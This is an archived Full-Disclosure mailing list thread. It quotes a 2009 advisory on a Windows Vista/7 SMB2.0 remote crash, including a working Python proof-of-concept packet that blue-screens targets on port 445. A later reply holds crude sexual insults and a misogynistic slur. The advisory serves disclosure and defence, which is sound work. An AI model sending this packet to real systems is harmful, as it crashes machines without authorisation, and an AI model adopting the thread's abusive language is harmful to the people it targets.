Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
How come all I hear about is n3td3v, and I see noone crying out
lout about this :
http://www.reversemode.com/index.php?option=com_mamblogItemid=15ta
sk=showaction=viewid=64Itemid=15
is fd all 'bout trolls nao?
- --
=
- - Release date: September 7th, 2009
- - Discovered by: Laurent GaffiƩ
- - Severity: Medium/High
=
I. VULNERABILITY
- -
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
II. BACKGROUND
- -
Windows vista and newer Windows comes with a new SMB version named
SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
erver_Message_Block_2.0
for more details.
III. DESCRIPTION
- -
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send
to a SMB server, and it's used
to identify the SMB dialect that will be used for futher
communication.
IV. PROOF OF CONCEPT
- -
Smb-Bsod.py:
#!/usr/bin/python
# When SMB2.0 recieve a char in the Process Id High SMB
header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket
from time import sleep
host = IP_ADDR, 445
buff = (
\x00\x00\x00\x90 # Begin SMB header: Session message
\xff\x53\x4d\x42 # Server Component: SMB
\x72\x00\x00\x00 # Negociate Protocol
\x00\x18\x53\xc8 # Operation 0x18 sub 0xc853
\x00\x26# Process ID High: -- :) normal value should be
\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
\x30\x30\x32\x00
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
V. BUSINESS IMPACT
- -
An attacker can remotly crash without no user interaction, any
Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.
VI. SYSTEMS AFFECTED
- -
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
Win Server 2008
as it use the same SMB2.0 driver (not tested).
VII. SOLUTION
- -
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.
VIII. REFERENCES
- -
http://microsoft.com
IX. CREDITS
- -
This vulnerability has been discovered by Laurent GaffiƩ
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/
X. LEGAL NOTICES
- -
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0
wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
6kWcu5Q=
=MjSD
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hey, buddy, you know spam filters sometimes can be stupid. Don't implement a stupid filter in your head. Just because I mention a troll in my email, have a hushmail address, and post a link you assume I must be rickrolling you or something? I was really surprised when I heard that Gaffie's remote DoS could infact be remote code exec. Not a mention here, unless I missed something. That's the link I posted, and since I don't understand shit to asm, I was expecting some feedback. BTW, this is not a flame, but sice you assumed I was trolling, I just wanted to make clear I was providing info, and waiting for feedback on it. PS : I use hush as disposable addresses, and it's none of your business. And I don't mind my sister sleeping around, she's just a whore anyway. - -- Does anybody care? In fact does anybody who contributes anything useful to this list use Hushmail? (at this time I am too lazy to look). If not I can set my spam filter. Amusing as it has been, it has grown tiresome. btw mr lawyer/mr random guy etc. my dick is bigger than yours, at least that's what your wife and sister tell me ;-) I am a noob with skills marginally better (debatable) than the average spotty first line support analyst. Therefore constructive criticism is welcomed, anything else is ignored unless I am bored or stupid enough to read/repond these postings after a bottle of Shiraz. regards the learner aka MrX ps I wish I didn't have so much to learn. -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkqoBUAACgkQRVBSp0SbIgej/QP/TfHJGc1k9EsuyMWfEIzLlC1RO1p0 wn34XeBrO/TzHCgam2jhMGSitbtOtOOGjLKyF+gBXGLaFwFDXh/dZamHtrDFLQGdzX2/ u7N5rkOSeiAmUys2K5h1iMMcohUlBpaLvsB9XrqBe1Oq3MFHV+H5NYusZlw1gFXNk0y6 qBRkqZE= =ymH2 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
